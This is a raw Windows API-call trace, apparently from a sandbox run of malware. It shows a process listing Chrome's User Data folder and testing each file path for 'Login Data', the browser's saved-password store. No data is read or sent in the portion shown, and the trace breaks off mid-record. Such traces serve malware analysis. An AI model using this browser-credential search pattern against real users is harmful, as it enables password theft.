[0162.900] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\pnacl" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\pnacl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\pnacl" [0162.900] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\pnacl", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\pnacl\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\pnacl\\*.*" [0162.901] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\pnacl\\*.*", lpFindFileData=0x2df358 | out: lpFindFileData=0x2df358*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x81e47510, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x81e47510, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x81e47510, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8f9ac0 [0162.901] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0162.901] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df358 | out: lpFindFileData=0x2df358*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x81e47510, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x81e47510, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x81e47510, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0162.901] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0162.901] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0162.901] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df358 | out: lpFindFileData=0x2df358*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x81e47510, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x81e47510, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x81e47510, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0162.901] FindClose (in: hFindFile=0x8f9ac0 | out: hFindFile=0x8f9ac0) returned 1 [0162.901] VirtualQuery (in: lpAddress=0x925400, lpBuffer=0x2df314, dwLength=0x1c | out: lpBuffer=0x2df314*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.901] GetProcessHeap () returned 0x8e0000 [0162.901] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925400 | out: hHeap=0x8e0000) returned 1 [0162.901] VirtualQuery (in: lpAddress=0x925360, lpBuffer=0x2df58c, dwLength=0x1c | out: lpBuffer=0x2df58c*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.901] GetProcessHeap () returned 0x8e0000 [0162.901] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925360 | out: hHeap=0x8e0000) returned 1 [0162.901] FindNextFileW (in: hFindFile=0x8f9a80, lpFindFileData=0x2df5d0 | out: lpFindFileData=0x2df5d0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85e6fa20, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85e6fa20, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x97f6e8b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x1400, dwReserved0=0x0, dwReserved1=0x0, cFileName="Safe Browsing Channel IDs", cAlternateFileName="SAFEBR~3")) returned 1 [0162.901] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data") returned 67 [0162.901] lstrlenW (lpString="\\") returned 1 [0162.901] GetProcessHeap () returned 0x8e0000 [0162.901] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x8a) returned 0x9252c8 [0162.901] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data" [0162.901] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\" [0162.901] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\") returned 68 [0162.901] lstrlenW (lpString="Safe Browsing Channel IDs") returned 25 [0162.901] GetProcessHeap () returned 0x8e0000 [0162.901] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xbc) returned 0x925360 [0162.901] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\" [0162.901] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\", lpString2="Safe Browsing Channel IDs" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Channel IDs") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Channel IDs" [0162.902] VirtualQuery (in: lpAddress=0x9252c8, lpBuffer=0x2df580, dwLength=0x1c | out: lpBuffer=0x2df580*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.902] GetProcessHeap () returned 0x8e0000 [0162.902] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9252c8 | out: hHeap=0x8e0000) returned 1 [0162.902] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Channel IDs", lpSrch="Login Data") returned 0x0 [0162.902] VirtualQuery (in: lpAddress=0x925360, lpBuffer=0x2df58c, dwLength=0x1c | out: lpBuffer=0x2df58c*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.902] GetProcessHeap () returned 0x8e0000 [0162.902] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925360 | out: hHeap=0x8e0000) returned 1 [0162.902] FindNextFileW (in: hFindFile=0x8f9a80, lpFindFileData=0x2df5d0 | out: lpFindFileData=0x2df5d0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85e6fa20, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85e6fa20, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x97f94a10, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Safe Browsing Channel IDs-journal", cAlternateFileName="SAFEBR~4")) returned 1 [0162.902] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data") returned 67 [0162.902] lstrlenW (lpString="\\") returned 1 [0162.902] GetProcessHeap () returned 0x8e0000 [0162.902] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x8a) returned 0x9252c8 [0162.902] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data" [0162.902] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\" [0162.902] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\") returned 68 [0162.902] lstrlenW (lpString="Safe Browsing Channel IDs-journal") returned 33 [0162.902] GetProcessHeap () returned 0x8e0000 [0162.902] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xcc) returned 0x8fcdb8 [0162.902] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\" [0162.902] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\", lpString2="Safe Browsing Channel IDs-journal" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Channel IDs-journal") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Channel IDs-journal" [0162.902] VirtualQuery (in: lpAddress=0x9252c8, lpBuffer=0x2df580, dwLength=0x1c | out: lpBuffer=0x2df580*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.902] GetProcessHeap () returned 0x8e0000 [0162.902] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9252c8 | out: hHeap=0x8e0000) returned 1 [0162.902] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Channel IDs-journal", lpSrch="Login Data") returned 0x0 [0162.902] VirtualQuery (in: lpAddress=0x8fcdb8, lpBuffer=0x2df58c, dwLength=0x1c | out: lpBuffer=0x2df58c*(BaseAddress=0x8fc000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2b000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.902] GetProcessHeap () returned 0x8e0000 [0162.902] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8fcdb8 | out: hHeap=0x8e0000) returned 1 [0162.902] FindNextFileW (in: hFindFile=0x8f9a80, lpFindFileData=0x2df5d0 | out: lpFindFileData=0x2df5d0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8582d950, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8582d950, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x1c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Safe Browsing Cookies", cAlternateFileName="SAFEBR~1")) returned 1 [0162.902] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data") returned 67 [0162.902] lstrlenW (lpString="\\") returned 1 [0162.902] GetProcessHeap () returned 0x8e0000 [0162.902] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x8a) returned 0x9252c8 [0162.902] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data" [0162.903] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\" [0162.903] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\") returned 68 [0162.903] lstrlenW (lpString="Safe Browsing Cookies") returned 21 [0162.903] GetProcessHeap () returned 0x8e0000 [0162.903] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb4) returned 0x925360 [0162.903] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\" [0162.903] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\", lpString2="Safe Browsing Cookies" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Cookies") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Cookies" [0162.903] VirtualQuery (in: lpAddress=0x9252c8, lpBuffer=0x2df580, dwLength=0x1c | out: lpBuffer=0x2df580*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.903] GetProcessHeap () returned 0x8e0000 [0162.903] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9252c8 | out: hHeap=0x8e0000) returned 1 [0162.903] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Cookies", lpSrch="Login Data") returned 0x0 [0162.903] VirtualQuery (in: lpAddress=0x925360, lpBuffer=0x2df58c, dwLength=0x1c | out: lpBuffer=0x2df58c*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.903] GetProcessHeap () returned 0x8e0000 [0162.903] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925360 | out: hHeap=0x8e0000) returned 1 [0162.903] FindNextFileW (in: hFindFile=0x8f9a80, lpFindFileData=0x2df5d0 | out: lpFindFileData=0x2df5d0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8582d950, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8582d950, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85d166b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Safe Browsing Cookies-journal", cAlternateFileName="SAFEBR~2")) returned 1 [0162.903] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data") returned 67 [0162.903] lstrlenW (lpString="\\") returned 1 [0162.903] GetProcessHeap () returned 0x8e0000 [0162.903] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x8a) returned 0x9252c8 [0162.903] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data" [0162.903] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\" [0162.903] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\") returned 68 [0162.903] lstrlenW (lpString="Safe Browsing Cookies-journal") returned 29 [0162.903] GetProcessHeap () returned 0x8e0000 [0162.903] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xc4) returned 0x925360 [0162.903] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\" [0162.903] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\", lpString2="Safe Browsing Cookies-journal" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Cookies-journal") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Cookies-journal" [0162.903] VirtualQuery (in: lpAddress=0x9252c8, lpBuffer=0x2df580, dwLength=0x1c | out: lpBuffer=0x2df580*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.903] GetProcessHeap () returned 0x8e0000 [0162.903] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9252c8 | out: hHeap=0x8e0000) returned 1 [0162.903] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Cookies-journal", lpSrch="Login Data") returned 0x0 [0162.903] VirtualQuery (in: lpAddress=0x925360, lpBuffer=0x2df58c, dwLength=0x1c | out: lpBuffer=0x2df58c*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.903] GetProcessHeap () returned 0x8e0000 [0162.903] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925360 | out: hHeap=0x8e0000) returned 1 [0162.904] FindNextFileW (in: hFindFile=0x8f9a80, lpFindFileData=0x2df5d0 | out: lpFindFileData=0x2df5d0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x81e213b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x81e213b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x81e213b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SSLErrorAssistant", cAlternateFileName="SSLERR~1")) returned 1 [0162.904] lstrcmpiW (lpString1="SSLErrorAssistant", lpString2=".") returned 1 [0162.904] lstrcmpiW (lpString1="SSLErrorAssistant", lpString2="..") returned 1 [0162.904] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data") returned 67 [0162.904] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data") returned 67 [0162.904] lstrlenW (lpString="\\") returned 1 [0162.904] GetProcessHeap () returned 0x8e0000 [0162.904] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x8a) returned 0x9252c8 [0162.904] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data" [0162.904] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\" [0162.904] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\") returned 68 [0162.904] lstrlenW (lpString="SSLErrorAssistant") returned 17 [0162.904] GetProcessHeap () returned 0x8e0000 [0162.904] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xac) returned 0x925360 [0162.904] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\" [0162.904] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\", lpString2="SSLErrorAssistant" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\SSLErrorAssistant") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\SSLErrorAssistant" [0162.904] VirtualQuery (in: lpAddress=0x9252c8, lpBuffer=0x2df580, dwLength=0x1c | out: lpBuffer=0x2df580*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.904] GetProcessHeap () returned 0x8e0000 [0162.904] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9252c8 | out: hHeap=0x8e0000) returned 1 [0162.904] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\SSLErrorAssistant") returned 85 [0162.904] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\SSLErrorAssistant") returned 85 [0162.904] lstrlenW (lpString="\\*.*") returned 4 [0162.904] GetProcessHeap () returned 0x8e0000 [0162.904] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb4) returned 0x925418 [0162.904] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\SSLErrorAssistant" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\SSLErrorAssistant") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\SSLErrorAssistant" [0162.904] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\SSLErrorAssistant", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\SSLErrorAssistant\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\SSLErrorAssistant\\*.*" [0162.905] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\SSLErrorAssistant\\*.*", lpFindFileData=0x2df358 | out: lpFindFileData=0x2df358*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x81e213b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x81e213b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x81e213b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8f9ac0 [0162.905] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0162.905] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df358 | out: lpFindFileData=0x2df358*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x81e213b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x81e213b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x81e213b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0162.905] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0162.905] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0162.905] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df358 | out: lpFindFileData=0x2df358*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x81e213b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x81e213b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x81e213b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0162.905] FindClose (in: hFindFile=0x8f9ac0 | out: hFindFile=0x8f9ac0) returned 1 [0162.906] VirtualQuery (in: lpAddress=0x925418, lpBuffer=0x2df314, dwLength=0x1c | out: lpBuffer=0x2df314*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.906] GetProcessHeap () returned 0x8e0000 [0162.906] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925418 | out: hHeap=0x8e0000) returned 1 [0162.906] VirtualQuery (in: lpAddress=0x925360, lpBuffer=0x2df58c, dwLength=0x1c | out: lpBuffer=0x2df58c*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.906] GetProcessHeap () returned 0x8e0000 [0162.906] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925360 | out: hHeap=0x8e0000) returned 1 [0162.906] FindNextFileW (in: hFindFile=0x8f9a80, lpFindFileData=0x2df5d0 | out: lpFindFileData=0x2df5d0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x81e213b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x81e213b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, 